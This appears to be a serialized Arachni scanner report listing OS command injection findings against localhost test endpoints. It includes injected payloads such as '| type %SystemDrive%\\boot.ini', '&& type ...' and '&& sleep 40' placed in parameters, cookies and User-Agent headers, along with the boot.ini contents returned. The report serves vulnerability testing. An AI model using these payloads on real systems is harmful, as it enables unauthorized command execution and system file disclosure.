'["[boot loader]\ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n[operating systems]\nmulti(0)disk(0)rdisk(0)partition(1)\\WINDOWS=\"Microsoft Windows XP Professional\" /fastdetect\n"]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjAy !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMTozOTozMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: [] internal_modname: OSCmdInjection internal_modname: OSCmdInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: input url: http://localhost:12305/windows/link/append?input=default elem: link method: GET name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :regexp: (?-mix:\[boot loader\](.*)\[operating systems\]) :match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n :substring: :ignore: :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :injected_orig: ! ' type %SystemDrive%\\boot.ini' :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": default type %SystemDrive%\\boot.ini :follow_location: true :injected: default type %SystemDrive%\\boot.ini :combo: !binary "aW5wdXQ=": default type %SystemDrive%\\boot.ini :action: http://localhost:12305/windows/link/append?input=default :verification: :id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n var: input url: http://localhost:12305/windows/link/append?input=default injected: default type %SystemDrive%\\boot.ini id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n regexp: (?-mix:\[boot loader\](.*)\[operating systems\]) regexp_match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n elem: link remarks: {} method: GET response: ! 
'["[boot loader]\ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n[operating systems]\nmulti(0)disk(0)rdisk(0)partition(1)\\WINDOWS=\"Microsoft Windows XP Professional\" /fastdetect\n"]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjAy !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMTozOTozMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: [] internal_modname: OSCmdInjection internal_modname: OSCmdInjection - !ruby/object:Arachni::Issue verification: true references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: cookie2 url: http://localhost:12305/windows/cookie/append elem: cookie method: GET name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: - !ruby/object:Arachni::Issue verification: true references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :regexp: (?-mix:\[boot loader\](.*)\[operating systems\]) :match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n :substring: :ignore: :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :injected_orig: ! ' type %SystemDrive%\\boot.ini' :altered: !binary |- Y29va2llMg== :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2llMg==": cookie value type %SystemDrive%\\boot.ini :injected: cookie value type %SystemDrive%\\boot.ini :combo: !binary "Y29va2llMg==": cookie value type %SystemDrive%\\boot.ini :action: http://localhost:12305/windows/cookie/append :verification: :id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n var: cookie2 url: http://localhost:12305/windows/cookie/append injected: cookie value type %SystemDrive%\\boot.ini id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n regexp: (?-mix:\[boot loader\](.*)\[operating systems\]) regexp_match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n elem: cookie remarks: {} method: GET response: ! 
'["[boot loader]\ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n[operating systems]\nmulti(0)disk(0)rdisk(0)partition(1)\\WINDOWS=\"Microsoft Windows XP Professional\" /fastdetect\n"]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value+type+%25SystemDrive%25\\boot.ini;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjAy !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMTozOTozMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: [] internal_modname: OSCmdInjection internal_modname: OSCmdInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: cookie url: http://localhost:12305/windows/cookie/straight elem: cookie method: GET name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." 
tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :regexp: (?-mix:\[boot loader\](.*)\[operating systems\]) :match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n :substring: :ignore: :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :injected_orig: ! '| type %SystemDrive%\\boot.ini' :altered: !binary |- Y29va2ll :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2ll": ! '| type %SystemDrive%\\boot.ini' :injected: ! '| type %SystemDrive%\\boot.ini' :combo: !binary "Y29va2ll": ! '| type %SystemDrive%\\boot.ini' :action: http://localhost:12305/windows/cookie/straight :verification: :id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n var: cookie url: http://localhost:12305/windows/cookie/straight injected: ! '| type %SystemDrive%\\boot.ini' id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n regexp: (?-mix:\[boot loader\](.*)\[operating systems\]) regexp_match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n elem: cookie remarks: {} method: GET response: ! 
'["[boot loader]\ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n[operating systems]\nmulti(0)disk(0)rdisk(0)partition(1)\\WINDOWS=\"Microsoft Windows XP Professional\" /fastdetect\n"]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=|+type+%25SystemDrive%25\\boot.ini response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjAy !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMTozOTozNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: [] internal_modname: OSCmdInjection internal_modname: OSCmdInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: User-Agent url: http://localhost:12305/windows/header/append elem: header method: GET name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :regexp: (?-mix:\[boot loader\](.*)\[operating systems\]) :match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n :substring: :ignore: :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :injected_orig: ! ' type %SystemDrive%\\boot.ini' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: arachni_user type %SystemDrive%\\boot.ini :injected: arachni_user type %SystemDrive%\\boot.ini :combo: User-Agent: arachni_user type %SystemDrive%\\boot.ini :action: http://localhost:12305/windows/header/append :verification: :id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n var: User-Agent url: http://localhost:12305/windows/header/append injected: arachni_user type %SystemDrive%\\boot.ini id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n regexp: (?-mix:\[boot loader\](.*)\[operating systems\]) regexp_match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n elem: header remarks: {} method: GET response: ! 
'["[boot loader]\ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n[operating systems]\nmulti(0)disk(0)rdisk(0)partition(1)\\WINDOWS=\"Microsoft Windows XP Professional\" /fastdetect\n"]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: arachni_user type %SystemDrive%\\boot.ini Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjAy !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMTozOTo0MCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: [] internal_modname: OSCmdInjection internal_modname: OSCmdInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: User-Agent url: http://localhost:12305/windows/header/straight elem: header method: GET name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." 
tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :regexp: (?-mix:\[boot loader\](.*)\[operating systems\]) :match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n :substring: :ignore: :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :injected_orig: ! '&& type %SystemDrive%\\boot.ini' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: ! '&& type %SystemDrive%\\boot.ini' :injected: ! '&& type %SystemDrive%\\boot.ini' :combo: User-Agent: ! '&& type %SystemDrive%\\boot.ini' :action: http://localhost:12305/windows/header/straight :verification: :id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n var: User-Agent url: http://localhost:12305/windows/header/straight injected: ! '&& type %SystemDrive%\\boot.ini' id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n regexp: (?-mix:\[boot loader\](.*)\[operating systems\]) regexp_match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n elem: header remarks: {} method: GET response: ! '["[boot loader]\ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n[operating systems]\nmulti(0)disk(0)rdisk(0)partition(1)\\WINDOWS=\"Microsoft Windows XP Professional\" /fastdetect\n"]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: ! 
'&& type %SystemDrive%\\boot.ini' Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjAy !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMTozOTo0MyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: [] internal_modname: OSCmdInjection internal_modname: OSCmdInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: input url: http://localhost:10769/linux/form/straight elem: form method: POST name: Operating system command injection (timing attack) description: ! 
"The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 28000.0 :timeout_divider: 1000 :timing_string: ! ' sleep __TIME__' :skip_orig: true :injected_orig: ! ' sleep 40' :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": ! ' sleep 40' :follow_location: true :injected: ! ' sleep 40' :combo: !binary "aW5wdXQ=": ! ' sleep 40' :action: http://localhost:10769/linux/form/straight :silent: true :regexp: '' var: input url: http://localhost:10769/linux/form/straight injected: ! ' sleep 40' id: regexp: '' regexp_match: elem: form remarks: {} method: POST response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value response: {} name: Operating system command injection (timing attack) description: ! 
"The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: [] internal_modname: OSCmdInjectionTiming internal_modname: OSCmdInjectionTiming - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: input url: http://localhost:10769/linux/link/straight?input=default elem: link method: GET name: Operating system command injection (timing attack) description: ! "The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." 
remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 28000.0 :timeout_divider: 1000 :timing_string: ! ' sleep __TIME__' :skip_orig: true :injected_orig: ! ' sleep 40' :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": ! ' sleep 40' :follow_location: true :injected: ! ' sleep 40' :combo: !binary "aW5wdXQ=": ! ' sleep 40' :action: http://localhost:10769/linux/link/straight?input=default :silent: true :regexp: '' var: input url: http://localhost:10769/linux/link/straight?input=default injected: ! ' sleep 40' id: regexp: '' regexp_match: elem: link remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value response: {} name: Operating system command injection (timing attack) description: ! "The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." 
remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: [] internal_modname: OSCmdInjectionTiming internal_modname: OSCmdInjectionTiming - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: cookie url: http://localhost:10769/linux/cookie/straight elem: cookie method: GET name: Operating system command injection (timing attack) description: ! "The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 28000.0 :timeout_divider: 1000 :timing_string: ! ' sleep __TIME__' :skip_orig: true :injected_orig: ! ' sleep 40' :altered: !binary |- Y29va2ll :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2ll": ! ' sleep 40' :injected: ! ' sleep 40' :combo: !binary "Y29va2ll": ! ' sleep 40' :action: http://localhost:10769/linux/cookie/straight :silent: true :regexp: '' var: cookie url: http://localhost:10769/linux/cookie/straight injected: ! 
' sleep 40' id: regexp: '' regexp_match: elem: cookie remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=+sleep+40 response: {} name: Operating system command injection (timing attack) description: ! "The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: [] internal_modname: OSCmdInjectionTiming internal_modname: OSCmdInjectionTiming - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: User-Agent url: http://localhost:10769/linux/header/straight elem: header method: GET name: Operating system command injection (timing attack) description: ! 
"The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 28000.0 :timeout_divider: 1000 :timing_string: ! '&& sleep __TIME__' :skip_orig: true :injected_orig: ! '&& sleep 40' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: ! '&& sleep 40' :injected: ! '&& sleep 40' :combo: User-Agent: ! '&& sleep 40' :action: http://localhost:10769/linux/header/straight :silent: true :regexp: '' var: User-Agent url: http://localhost:10769/linux/header/straight injected: ! '&& sleep 40' id: regexp: '' regexp_match: elem: header remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: ! '&& sleep 40' Cookie: cookie=cookie+value response: {} name: Operating system command injection (timing attack) description: ! 
"The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: [] internal_modname: OSCmdInjectionTiming internal_modname: OSCmdInjectionTiming - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: input url: http://localhost:10769/bsd/form/straight elem: form method: POST name: Operating system command injection (timing attack) description: ! "The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." 
remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 28000.0 :timeout_divider: 1000 :timing_string: ! ' sleep __TIME__' :skip_orig: true :injected_orig: ! ' sleep 40' :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": ! ' sleep 40' :follow_location: true :injected: ! ' sleep 40' :combo: !binary "aW5wdXQ=": ! ' sleep 40' :action: http://localhost:10769/bsd/form/straight :silent: true :regexp: '' var: input url: http://localhost:10769/bsd/form/straight injected: ! ' sleep 40' id: regexp: '' regexp_match: elem: form remarks: {} method: POST response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value response: {} name: Operating system command injection (timing attack) description: ! "The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." 
